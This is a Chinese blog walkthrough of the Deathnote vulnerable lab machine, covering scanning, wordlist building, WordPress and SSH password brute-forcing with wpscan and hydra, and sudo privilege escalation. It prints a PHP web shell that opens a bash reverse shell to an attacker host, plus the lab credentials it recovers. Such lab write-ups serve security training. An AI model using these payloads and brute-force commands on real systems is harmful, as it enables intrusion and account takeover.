deathnote靶机攻略

已于 2023-10-12 21:46:50 修改
阅读量140 收藏
点赞数 3
分类专栏: 靶机系列 文章标签: 网络安全 web安全 安全威胁分析 安全 密码学 其他 笔记
于 2023-10-12 21:45:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133799872
版权

deathnote

扫描及信息搜集

此靶机需要修改/etc/hosts添加dns,不然无法跳转主页

nmap -sV -A -p- 10.4.7.133

dirsearch -u http://10.4.7.133

image-20231012114854770

image-20231012114922267

http://10.4.7.133/robots.txt

在此目录下发现提示

image-20231012140600001

访问下,发现无法正常显示

image-20231012140932309

wget http://10.4.7.133/important.jpg

cat important.jpg

image-20231012141121620

提示在hint

image-20231012142030291

需要找到notes.txt和user.txt,再使用dirb扫描看看结果

dirb http://10.4.7.133

在结果中尝试访问

http://10.4.7.133/wordpress/wp-content/uploads/2021/07/

image-20231012142741182

找到这两个文件

使用wget下载这两个文件

image-20231012142900491

使用爬取将密码写入一个文件

cewl http://deathnote.vuln/wordpress/ -w kirapasswd.txt

再把hint页中的这条加入密码本,将notes.txt也放入密码本

image-20231012143627659

密码爆破

wpscan --url http://10.4.7.133/wordpress/ -U user.txt -P kirapasswd.txt

image-20231012170433547

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f -t 50

image-20231012210922451

l
death4me

渗透

image-20231012202857350

此处发现上传框,尝试上传木马

木马内容

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

image-20231012203921480

点击木马文件复制url

image-20231012204140549

kali开启nc

nc -lvvp 12138

随后访问复制的url执行木马即可反弹成功

家目录l目录下发现user.txt文件,该密码文件为brainfuck

image-20231012204450715

解码结果为如图

image-20231012204629597

上述信息没发现有啥作用

在/opt目录下有信息文件

image-20231012205437099

image-20231012205539187

image-20231012205709700

尝试解码

image-20231012205848001

image-20231012210107513

如图16进制解码再用base64解码得到密码

passwd : kiraisevil

尝试使用su root或者sudo -l发现不能使用

使用上面九头蛇爆破的ssh l登录,发现和反弹shell的用户没什么区别

于是将密码新破解的密码放入密码字典再次尝试爆破,看看是不是其它用户的密码

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f 50

image-20231012213347476

得到新用户

kira
kiraisevil

提权

image-20231012213634064

登录kira账户

查看id发现有sudo权限

执行sudo -l发现有sudo所有权限

执行sudo su root完成提权

image-20231012213924737

order libra
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Deathnote靶机
qq_40646572的博客
05-19 703
信息收集 开启deathnote靶机。 通过nmap扫描,发现靶机开启了80端口以及22端口。 地址栏输入ip地址,页面跳转。因此需要配置dns。 配置下/etc/hosts文件。 使用whatweb工具识别下web服务中使用的技术,发现使用的是wordpress框架。 发现http://deathnote.vuln/ 网站下存在关键文件robots.txt。 上面提示到提示信息在important.jpg文件中。 图片无法正确加载出来,那就先下载下来。 发现直接使用cat方法可以直
Deathnote靶机实验实战演练
lianliandad的博客
10-31 871
Vulnhub靶机_Deathnote
学术渣渣的博客
09-12 1942
文章目录靶机介绍渗透过程获取靶机IP端口扫描dirb扫描网站目录信息1信息2信息3登录wordpresshydra 爆破密码提权 靶机介绍 下载地址: http://www.vulnhub.com/entry/deathnote-1,739/ 难度:简单 介绍: don’t waste too much time thinking outside the box . It is a Straight forward box . 渗透过程 获取靶机IP arp-scan -l 得到靶机的IP为:192.1
靶机14 DEATHNOTE: 1
honest_gg的博客
10-09 1098
不要浪费太多时间跳出框框思考。这是一个直截了当的盒子
DEATHNOTE
10-24
DEATHNOTE》——探索字体设计的艺术与应用 在数字化时代,字体设计不仅是文字的呈现方式,更是传达信息、塑造品牌形象、营造氛围的关键元素。"DEATHNOTE"这个标题,或许让人联想到著名的日本动漫作品《死亡笔记》...
deathnote-web
05-12
死亡笔记网 安装 npm i 跑步 npm start 结构 src/Services包含与API请求/响应相关的组件,挂钩和函数。 src/Components包含与UI相关的可重用的React组件。 src/router包含页面(路由)。
DeathNote-crx插件
04-06
"DeathNote-crx插件"是一款专为浏览器设计的扩展程序,主要特色在于它将流行的《死亡笔记》(Death Note)元素融入了用户的网络浏览体验。这款插件以德语(Deutsch)为主要语言,旨在为每一个新打开的标签页带来一种...
DeathNote.github.io
05-30
"死亡笔记.github.io"是一个基于GitHub Pages构建的个人网页项目,标题中的"DeathNote.github.io"通常是指这个项目的在线地址,表明它是一个公开的、与《死亡笔记》这个主题相关或者以此为灵感的个人网站。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8435
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全售前入门04——审计类产品了解
打工人
08-26 513
数据库审计是结合各类法令法规(如等级保护2.0、分级保护、企业内控、SOX、PCI等)对数据库安全的要求,细粒度审计、双向审计、全方位风险控制,是一款基于对数据库传输协议深度解析的基础上,进行风险和告警通知的系统。
网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
最新发布
goldfish8848的博客
08-31 1039
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1004
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
网络安全分析cookie实现PII IDOR
等风来
08-27 136
目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。
网络安全 加密编码进制
m0_73245690的博客
08-31 682
BASE64 编码:用于在文本格式中传输二进制数据,增加数据长度约 33%。URL 编码:用于将 URL 中的特殊字符转换为百分号编码格式,确保 URL 的安全传输。HEX 编码:将二进制数据转换为直观的十六进制字符表示,便于调试和数据分析。ASCII 编码:历史悠久的文本编码标准,适用于表示基础的英文字母和控制字符。这些编码方式各有其用途,选择合适的编码方式取决于具体的应用场景和数据类型。JS 前端代码加密:通常指代码混淆,通过工具减少代码可读性,但仍可被解码。JS 颜文字。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-30 948
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】绕过输入验证
等风来
08-27 188
输入验证是检查用户输入的数据是否符合特定要求和约束的过程,这个过程通常发生在注册时填写信息时。它对于确保应用程序的安全性至关重要,因为不当的输入可能会引发严重的安全漏洞
自学黑客(网络安全
2301_77160226的博客
08-31 1566
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络...
05-28
出现更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络的情况,可能是因为以下原因之一: 1. 网络连接问题:请检查您的网络连接是否正常,确保您的设备已连接到互联网。 2. 防火墙或代理问题:请检查您的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值